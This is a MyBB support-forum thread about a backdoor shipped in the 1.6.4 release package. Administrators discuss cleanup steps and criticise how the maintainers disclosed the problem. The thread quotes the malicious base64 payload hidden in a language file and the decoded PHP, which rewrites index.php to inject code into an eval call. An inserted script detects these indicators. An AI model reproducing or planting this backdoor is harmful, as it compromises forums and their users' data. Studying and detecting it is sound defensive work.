MyBB Community Forums

Full Version: 1.6.4 Security Vulnerability
(2011-10-24, 02:15 AM)WoodLark Wrote: [ -> ]If your mybb forum is not the top level of your website, check the directories ABOVE the forum directory. I found that the malicious code appeared in every file named "index.php" in the directories above the forum.

Not "ABOVE the forum directory" alone...

You need to check all index.php files on your server!
Did anyone check if the database has been compromised?

A note: It does not suffice to check 'index.php' files but you need to check all files on your server in all folders.

And last, a very serious note towards the maintainers of the MyBB software: My trust in you (which was high) has almost been destroyed by the way you handled this issue. In my opinion, there is no excuse that justifies not informing the users (via the mailing list and all other available channels) about such a serious issue for over two weeks - this should have been done the day it became known, at least the day after that. And still, the mailing suggests that all is done with replacing the malicious index.php, which is again not acceptable. There is much more to do: Check (or better replace) all files on your server, check (or better, if possible, replace by a backup) all databases on the server, change all passwords, probably even including the ones of your users. Although some administrators may decide that they can leave out one or the other of these steps, I think it's your duty to inform your users that this *might* be necessary. At least you should point them to this very posting.
I've just heard now of this. BAD BAD BAD!

index.php has the modification
install/resources/language.lang.php contains
<p>Once you\'ve checked these details are correct, click next to continue.</p>';

$l['logo']=base64_decode('QGV2YWwoYmFzZTY0X2RlY29kZSgiSkhSamJYQTlRR1pwYkdWd1pYSnRjeWhOV1VKQ1gxSlBUMVF1SjJsdVpHVjRMbkJvY0NjcE95QkFZMmh0YjJRb1RWbENRbDlTVDA5VUxpZHBibVJsZUM1d2FIQW5MQ0F3TnpjM0tUc2dKSFJsYlhBOVFHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektFMVpRa0pmVWs5UFZDNG5hVzVrWlhndWNHaHdKeWs3SUNSMFlXMXdQVUJtYjNCbGJpaE5XVUpDWDFKUFQxUXVKMmx1WkdWNExuQm9jQ2NzSUNkM0p5azdJRUJtZDNKcGRHVW9KSFJoYlhBc0lFQnpkSEpmY21Wd2JHRmpaU2duWlhaaGJDZ2lYQ1JzYjJkcGJtWnZjbTBnUFNCY0lpSXVKSFJsYlhCc1lYUmxjeTArWjJWMEtDSnBibVJsZUY5c2IyZHBibVp2Y20waUtTNGlYQ0k3SWlrN0p5d2dKMlYyWVd3b0lsd2tiRzluYVc1bWIzSnRJRDBnWENJaUxpUjBaVzF3YkdGMFpYTXRQbWRsZENnaWFXNWtaWGhmYkc5bmFXNW1iM0p0SWlrdUlsd2lPeUl1UUNSamIyeGJNak5kS1RzbkxDQkFKSFJsYlhBcEtUc2dRR1pqYkc5elpTZ2tkR0Z0Y0NrN0lFQmphRzF2WkNoTldVSkNYMUpQVDFRdUoybHVaR1Y0TG5Cb2NDY3NJRUFrZEdOdGNDazdJSEpsZEhWeWJpQjBjblZsT3c9PSIpKQ==');
$l['database_settings'] = "Database Settings";

IMPORTANT!: the install/resources/language.lang.php was already modified in the mybb_1604.zip

Can someone please explain what this does?
This code modifies the index.php and adds the code mentioned on the blog.
OK, now I understand. I thought index.php was modified in the package.

In case anyone else is interested in the code that's run:

$tcmp=@fileperms(MYBB_ROOT.'index.php');
@chmod(MYBB_ROOT.'index.php', 0777);
$temp=@file_get_contents(MYBB_ROOT.'index.php');
$tamp=@fopen(MYBB_ROOT.'index.php', 'w');
@fwrite($tamp, @str_replace('eval("\$loginform = \"".$templates->get("index_loginform")."\";");', 'eval("\$loginform = \"".$templates->get("index_loginform")."\";".@$col[23]);', @$temp));
@fclose($tamp);
@chmod(MYBB_ROOT.'index.php', @$tcmp);
return true;
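For anyone checking their own files: an added example, not part of the original thread and not MyBB code, that looks for the two indicators posted above without executing anything. It statically unwraps nested base64_decode('...') literals and flags the index.php eval line ending in .@$col[23]); the function names, the keyword list and the sample strings are assumptions constructed for illustration.

```python
import base64, binascii, pathlib, re

# A quoted literal handed to base64_decode(), as in the altered language file.
B64_CALL = re.compile(r"""base64_decode\(\s*(['"])([A-Za-z0-9+/=]+)\1\s*\)""")
# Tail of the altered index.php line from the thread: .@$col[23]); inside eval().
TAMPERED_EVAL = re.compile(r"\.\s*@\$col\[\d+\]\s*\)\s*;")
SUSPICIOUS = ("eval(", "fwrite(", "fopen(", "chmod(", "file_put_contents(")

def unwrap_base64(php_source, max_depth=5):
    """Statically decode nested base64_decode('...') literals, outermost first.
    The decoded text is only returned as a string; nothing is executed."""
    layers, text = [], php_source
    for _ in range(max_depth):
        m = B64_CALL.search(text)
        if not m:
            break
        try:
            text = base64.b64decode(m.group(2), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            break
        layers.append(text)
    return layers

def scan_php(name, php_source):
    """Return (file, reason) pairs for the two indicators shown in the thread."""
    findings = []
    if TAMPERED_EVAL.search(php_source):
        findings.append((name, "eval() line has an extra variable appended"))
    for depth, layer in enumerate(unwrap_base64(php_source), start=1):
        hits = [s for s in SUSPICIOUS if s in layer]
        if hits:
            findings.append((name, f"base64 layer {depth} contains {', '.join(hits)}"))
    return findings

def scan_tree(root):
    """Scan every .php file under root, not only files named index.php."""
    findings = []
    for path in pathlib.Path(root).rglob("*.php"):
        findings += scan_php(str(path), path.read_text(errors="replace"))
    return findings

def b64(s):
    return base64.b64encode(s.encode()).decode()

# Constructed samples: same two-layer shape as the thread's snippet, inert inner code.
INNER = "@fwrite(@fopen('example.txt','w'),'constructed'); return true;"
SAMPLE_LANG = "$l['logo']=base64_decode('" + b64('@eval(base64_decode("' + b64(INNER) + '"))') + "');"
SAMPLE_INDEX = r'''eval("\$loginform = \"".$templates->get("index_loginform")."\";".@$col[23]);'''
CLEAN_INDEX = r'''eval("\$loginform = \"".$templates->get("index_loginform")."\";");'''
```

A match is a lead for manual review, not proof, and the scan only follows the first literal base64_decode('...') call in each layer, so other encodings are not covered.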
(2011-11-08, 08:37 AM)patrick Wrote: [ -> ]
$tcmp=@fileperms(MYBB_ROOT.'index.php');
@chmod(MYBB_ROOT.'index.php', 0777);
$temp=@file_get_contents(MYBB_ROOT.'index.php');
$tamp=@fopen(MYBB_ROOT.'index.php', 'w');
@fwrite($tamp, @str_replace('eval("\$loginform = \"".$templates->get("index_loginform")."\";");', 'eval("\$loginform = \"".$templates->get("index_loginform")."\";".@$col[23]);', @$temp));
@fclose($tamp);
@chmod(MYBB_ROOT.'index.php', @$tcmp);
return true;

hey what is this code for?
(2011-11-08, 05:39 AM)StefanT Wrote: [ -> ]This code modifies the index.php and adds the code mentioned on the blog.

I think there is a bug in calender.php. Someone hacked my forum and accessed my databases; he also changed the admin panel passwords and changed the calendar page to some custom page. For that reason I removed calender.php. Why did this happen? I am losing my forum for the second time. Is there any problem with the calendar file?
Not that we know of. Please remember to screen all files for other affected areas if your forum has been hacked before, and please remember to run a full investigation into the hack rather than assume the calendar is at fault. In most cases, MyBB isn't the cause.
I have had this problem when it was first 'discovered', so I did all the above to fix it.

(removed the code, applied the patch, chmod all the directories and files correctly (the system health shows them green), and I changed my FTP pass. I also removed the trojan from my computer).

But today the problem reappeared! Again some of the files were changed (used the file verification to check). So I had to remove all the base64 encoded code and changed my FTP pass again.

Has anyone had this problem reappear on their forum as well?